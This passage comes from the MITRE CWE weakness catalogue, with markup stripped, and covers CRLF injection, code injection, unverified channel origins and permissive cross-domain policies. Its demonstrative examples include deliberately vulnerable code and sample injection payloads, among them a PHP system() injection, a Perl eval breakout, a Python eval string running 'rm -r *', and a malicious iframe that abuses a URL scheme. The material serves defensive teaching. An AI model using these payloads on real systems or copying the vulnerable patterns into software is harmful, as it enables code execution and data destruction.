line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs. + + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Modify Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Avoid using CRLF as a special sequence. + + + Implementation + Appropriately filter or quote CRLF sequences in user-controlled input. + + + + + If user input data that eventually makes it to a log message isn't checked for CRLF characters, it may be possible for an attacker to forge entries in a log file. + + logger.info("User's street address: " + request.getParameter("streetAddress")); + + + + + + CVE-2002-1771 + CRLF injection enables spam proxy (add mail headers) using email address or name. + https://www.cve.org/CVERecord?id=CVE-2002-1771 + + + CVE-2002-1783 + CRLF injection in API function arguments modify headers for outgoing requests. + https://www.cve.org/CVERecord?id=CVE-2002-1783 + + + CVE-2004-1513 + Spoofed entries in web server log file via carriage returns + https://www.cve.org/CVERecord?id=CVE-2004-1513 + + + CVE-2006-4624 + Chain: inject fake log entries with fake timestamps using CRLF injection + https://www.cve.org/CVERecord?id=CVE-2006-4624 + + + CVE-2005-1951 + Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting. + https://www.cve.org/CVERecord?id=CVE-2005-1951 + + + CVE-2004-1687 + Chain: HTTP response splitting via CRLF in parameter related to URL. + https://www.cve.org/CVERecord?id=CVE-2004-1687 + + + + + CRLF Injection + + + A2 + Injection Flaws + CWE More Specific + + + 24 + HTTP Request Splitting + + + SFP24 + Tainted input to command + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated References + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2010-02-16 + updated Related_Attack_Patterns, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CRLF Injection + Failure to Sanitize CRLF Sequences (aka 'CRLF Injection') + Failure to Sanitize CRLF Sequences ('CRLF Injection') + + + + The product uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme. + Mobile platforms and other architectures allow the use of custom URL schemes to facilitate communication between applications. In the case of iOS, this is the only method to do inter-application communication. The implementation is at the developer's discretion which may open security flaws in the application. An example could be potentially dangerous functionality such as modifying files through a custom URL scheme. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Architecture and Design + + Utilize a user prompt pop-up to authorize potentially harmful actions such as those modifying data or dealing with sensitive information. + When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate. + + + + + + This iOS application uses a custom URL scheme. The replaceFileText action in the URL scheme allows an external application to interface with the file incomingMessage.txt and replace the contents with the text field of the query string. + External Application + + NSString *stringURL = @"appscheme://replaceFileText?file=incomingMessage.txt&text=hello";NSURL *url = [NSURL URLWithString:stringURL];[[UIApplication sharedApplication] openURL:url]; + + Application URL Handler + + + - (BOOL)application:(UIApplication *)application handleOpenURL:(NSURL *)url {if (!url) {return NO;}NSString *action = [url host];if([action isEqualToString: @"replaceFileText"]) {NSDictionary *dict = [self parseQueryStringExampleFunction:[url query]]; + //this function will write contents to a specified file + FileObject *objectFile = [self writeToFile:[dict objectForKey: @"file"] withText:[dict objectForKey: @"text"]];}return YES;} + + The handler has no restriction on who can use its functionality. The handler can be invoked using any method that invokes the URL handler such as the following malicious iframe embedded on a web page opened by Safari. + + <iframe src="appscheme://replaceFileText?file=Bookmarks.dat&text=listOfMaliciousWebsites"> + + The attacker can host a malicious website containing the iframe and trick users into going to the site via a crafted phishing email. Since Safari automatically executes iframes, the user is not prompted when the handler executes the iframe code which automatically invokes the URL handler replacing the bookmarks file with a list of malicious websites. Since replaceFileText is a potentially dangerous action, an action that modifies data, there should be a sanity check before the writeToFile:withText: function. + + + These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: + + + // Android + @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ + if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} + } + + + + // iOS + -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ + NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ + NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ + + + // Make data available back in webview. + UIWebView *webView = [self writeDataToView:[URL query]]; + }return NO; + }return YES; + } + + A call into native code can then be initiated by passing parameters within the URL: + + window.location = examplescheme://method?parameter=value + + Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. + + + + + CVE-2013-5725 + URL scheme has action replace which requires no user prompt and allows remote attackers to perform undesired actions. + https://www.cve.org/CVERecord?id=CVE-2013-5725 + + + CVE-2013-5726 + URL scheme has action follow and favorite which allows remote attackers to force user to perform undesired actions. + https://www.cve.org/CVERecord?id=CVE-2013-5726 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2014-01-14 + 2.6 + 2014-02-19 + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. + + When a product allows a user's input to contain code syntax, it might be possible for an attacker to craft the code in such a way that it will alter the intended control flow of the product. Such an alteration could lead to arbitrary code execution. + Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities. + + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Access Control + Bypass Protection Mechanism + In some cases, injectable code controls authentication; this may lead to a remote vulnerability. + + + Access Control + Gain Privileges or Assume Identity + Injected code can access resources that the attacker is directly prevented from accessing. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code. + + + Non-Repudiation + Hide Activities + Often the actions performed by injected control code are unlogged. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Refactor your program so that you do not have to dynamically generate code. + + + Architecture and Design + + Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. + Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit(). + + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Testing + Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + Operation + Compilation or Build Hardening + Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). + + + Operation + Environment Hardening + Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). + + + + + This example attempts to write user messages to a message file and allow users to view them. + + $MessageFile = "messages.out";if ($_GET["action"] == "NewMessage") {$name = $_GET["name"];$message = $_GET["message"];$handle = fopen($MessageFile, "a+");fwrite($handle, "<b>$name</b> says '$message'<hr>\n");fclose($handle);echo "Message Saved!<p>\n";}else if ($_GET["action"] == "ViewMessages") {include($MessageFile);} + + While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as: + + name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E + + which will decode to the following: + + <?php system("/bin/ls -l");?> + + The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages. + Notice that XSS (CWE-79) is also possible in this situation. + + + edit-config.pl: This CGI script is used to modify settings in a configuration file. + + use CGI qw(:standard); + sub config_file_add_key { + my ($fname, $key, $arg) = @_; + + # code to add a field/key to a file goes here + + + } + sub config_file_set_key { + my ($fname, $key, $arg) = @_; + + # code to set key to a particular file goes here + + + } + sub config_file_delete_key { + my ($fname, $key, $arg) = @_; + + # code to delete key from a particular file goes here + + + } + sub handleConfigAction { + my ($fname, $action) = @_;my $key = param('key');my $val = param('val'); + + # this is super-efficient code, especially if you have to invoke + + + + # any one of dozens of different functions! + + my $code = "config_file_$action_key(\$fname, \$key, \$val);";eval($code); + } + $configfile = "/home/cwe/config.txt";print header;if (defined(param('action'))) {handleConfigAction($configfile, param('action'));}else {print "No action specified!\n";} + + The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: + + add_key(",","); system("/bin/ls"); + + This would produce the following string in handleConfigAction(): + + config_file_add_key(",","); system("/bin/ls"); + + Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated. + + + This simple script asks a user to supply a list of numbers as input and adds them together. + + + def main(): + + sum = 0 + numbers = eval(input("Enter a space-separated list of numbers: ")) + for num in numbers: + + sum = sum + num + + print(f"Sum of {numbers} = {sum}") + + main() + + + The eval() function can take the user-supplied list and convert it into a Python list object, therefore allowing the programmer to use list comprehension methods to work with the data. However, if code is supplied to the eval() function, it will execute that code. For example, a malicious user could supply the following string: + + __import__('subprocess').getoutput('rm -r *') + + This would delete all the files in the current directory. For this reason, it is not recommended to use eval() with untrusted input. + A way to accomplish this without the use of eval() is to apply an integer conversion on the input within a try/except block. If the user-supplied input is not numeric, this will raise a ValueError. By avoiding eval(), there is no opportunity for the input string to be executed as code. + + + def main(): + + sum = 0 + numbers = input("Enter a space-separated list of numbers: ").split(" ") + try: + + for num in numbers: + + sum = sum + int(num) + + print(f"Sum of {numbers} = {sum}") + + except ValueError: + + print("Error: invalid input") + + + main() + + + An alternative option is to use the ast.literal_eval() function from Python's ast module. This function considers only Python literals as valid data types and will not execute any code contained within the user input. + + + + + CVE-2022-2054 + Python compiler uses eval() to execute malicious strings as Python code. + https://www.cve.org/CVERecord?id=CVE-2022-2054 + + + CVE-2021-22204 + Chain: regex in EXIF processor code does not correctly determine where a string ends (CWE-625), enabling eval injection (CWE-95), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-22204 + + + CVE-2020-8218 + "Code injection" in VPN product, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-8218 + + + CVE-2008-5071 + Eval injection in PHP program. + https://www.cve.org/CVERecord?id=CVE-2008-5071 + + + CVE-2002-1750 + Eval injection in Perl program. + https://www.cve.org/CVERecord?id=CVE-2002-1750 + + + CVE-2008-5305 + Eval injection in Perl program using an ID that should only contain hyphens and numbers. + https://www.cve.org/CVERecord?id=CVE-2008-5305 + + + CVE-2002-1752 + Direct code injection into Perl eval function. + https://www.cve.org/CVERecord?id=CVE-2002-1752 + + + CVE-2002-1753 + Eval injection in Perl program. + https://www.cve.org/CVERecord?id=CVE-2002-1753 + + + CVE-2005-1527 + Direct code injection into Perl eval function. + https://www.cve.org/CVERecord?id=CVE-2005-1527 + + + CVE-2005-2837 + Direct code injection into Perl eval function. + https://www.cve.org/CVERecord?id=CVE-2005-2837 + + + CVE-2005-1921 + MFV. code injection into PHP eval statement using nested constructs that should not be nested. + https://www.cve.org/CVERecord?id=CVE-2005-1921 + + + CVE-2005-2498 + MFV. code injection into PHP eval statement using nested constructs that should not be nested. + https://www.cve.org/CVERecord?id=CVE-2005-2498 + + + CVE-2005-3302 + Code injection into Python eval statement from a field in a formatted file. + https://www.cve.org/CVERecord?id=CVE-2005-3302 + + + CVE-2007-1253 + Eval injection in Python program. + https://www.cve.org/CVERecord?id=CVE-2007-1253 + + + CVE-2001-1471 + chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement. + https://www.cve.org/CVERecord?id=CVE-2001-1471 + + + CVE-2002-0495 + Perl code directly injected into CGI library file from parameters to another CGI program. + https://www.cve.org/CVERecord?id=CVE-2002-0495 + + + CVE-2005-1876 + Direct PHP code injection into supporting template file. + https://www.cve.org/CVERecord?id=CVE-2005-1876 + + + CVE-2005-1894 + Direct code injection into PHP script that can be accessed by attacker. + https://www.cve.org/CVERecord?id=CVE-2005-1894 + + + CVE-2003-0395 + PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script. + https://www.cve.org/CVERecord?id=CVE-2003-0395 + + + + + CODE + Code Evaluation and Injection + + + Part 4-2 + Req CR 3.5 + + + Part 3-3 + Req SR 3.5 + + + Part 4-1 + Req SVV-1 + + + Part 4-1 + Req SVV-3 + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Research_Gaps, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Type + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested mappings to ISA/IEC 62443. + + Code Injection + Failure to Control Generation of Code (aka 'Code Injection') + Failure to Control Generation of Code ('Code Injection') + + + + The product establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin. + When an attacker can successfully establish a communication channel from an untrusted origin, the attacker may be able to gain privileges and access unexpected functionality. + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Other + Gain Privileges or Assume Identity + Varies by Context + An attacker can access any functionality that is inadvertently accessible to the source. + + + + + Architecture and Design + + Use a mechanism that can validate the identity of the source, such as a certificate, and validate the integrity of data to ensure that it cannot be modified in transit using an Adversary-in-the-Middle (AITM) attack. + When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate. + + + + + + This Android application will remove a user account when it receives an intent to do so: + + IntentFilter filter = new IntentFilter("com.example.RemoveUser");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + public class DeleteReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {int userID = intent.getIntExtra("userID");destroyUserData(userID);}} + + This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file. + + + These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: + + + // Android + @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ + if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} + } + + + + // iOS + -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ + NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ + NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ + + + // Make data available back in webview. + UIWebView *webView = [self writeDataToView:[URL query]]; + }return NO; + }return YES; + } + + A call into native code can then be initiated by passing parameters within the URL: + + window.location = examplescheme://method?parameter=value + + Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. + + + + + CVE-2000-1218 + DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning + https://www.cve.org/CVERecord?id=CVE-2000-1218 + + + CVE-2005-0877 + DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning + https://www.cve.org/CVERecord?id=CVE-2005-0877 + + + CVE-2001-1452 + DNS server caches glue records received from non-delegated name servers + https://www.cve.org/CVERecord?id=CVE-2001-1452 + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + While many access control issues involve authenticating the user, this weakness is more about authenticating the actual source of the communication channel itself; there might not be any "user" in such cases. + + + + CWE Content Team + MITRE + 2014-02-13 + 2.6 + 2014-02-19 + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor. + + Attackers at the destination may be able to spoof trusted servers to steal data or cause a denial of service. + There are at least two distinct weaknesses that can cause the product to communicate with an unintended destination: + + If the product allows an attacker to control which destination is specified, then the attacker can cause it to connect to an untrusted or malicious destination. For example, because UDP is a connectionless protocol, UDP packets can be spoofed by specifying a false source address in the packet; when the server receives the packet and sends a reply, it will specify a destination by using the source of the incoming packet - i.e., the false source. The server can then be tricked into sending traffic to the wrong host, which is effective for hiding the real source of an attack and for conducting a distributed denial of service (DDoS). As another example, server-side request forgery (SSRF) and XML External Entity (XXE) can be used to trick a server into making outgoing requests to hosts that cannot be directly accessed by the attacker due to firewall restrictions. + If the product incorrectly specifies the destination, then an attacker who can control this destination might be able to spoof trusted servers. While the most common occurrence is likely due to misconfiguration by an administrator, this can be resultant from other weaknesses. For example, the product might incorrectly parse an e-mail or IP address and send sensitive data to an unintended destination. As another example, an Android application may use a "sticky broadcast" to communicate with a receiver for a particular application, but since sticky broadcasts can be processed by *any* receiver, this can allow a malicious application to access restricted data that was only intended for a different application. + + + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + This code listens on a port for DNS requests and sends the result to the requesting address. + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true: + data = sock.recvfrom(1024)if not data:break + (requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record) + + + + This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed ('spoofed'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic. + + + + + CVE-2013-5211 + composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses. + https://www.cve.org/CVERecord?id=CVE-2013-5211 + + + CVE-1999-0513 + Classic "Smurf" attack, using spoofed ICMP packets to broadcast addresses. + https://www.cve.org/CVERecord?id=CVE-1999-0513 + + + CVE-1999-1379 + DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker. + https://www.cve.org/CVERecord?id=CVE-1999-1379 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2014-02-13 + 2.6 + 2014-02-19 + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a cross-domain policy file that includes domains that should not be trusted. + + A cross-domain policy file ("crossdomain.xml" in Flash and "clientaccesspolicy.xml" in Silverlight) defines a list of domains from which a server is allowed to make cross-domain requests. When making a cross-domain request, the Flash or Silverlight client will first look for the policy file on the target server. If it is found, and the domain hosting the application is explicitly allowed to make requests, the request is made. + Therefore, if a cross-domain policy file includes domains that should not be trusted, such as when using wildcards, then the application could be attacked by these untrusted domains. + An overly permissive policy file allows many of the same attacks seen in Cross-Site Scripting (CWE-79). Once the user has executed a malicious Flash or Silverlight application, they are vulnerable to a variety of attacks. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. + In many cases, the attack can be launched without the victim even being aware of it. + + + + + + + + + + + + + + Implementation + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Read Application Data + Varies by Context + An attacker may be able to bypass the web browser's same-origin policy. An attacker can exploit the weakness to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Attack Surface Reduction + Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server. + + + Architecture and Design + Operation + Environment Hardening + For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server. + + + Architecture and Design + Operation + Attack Surface Reduction + For 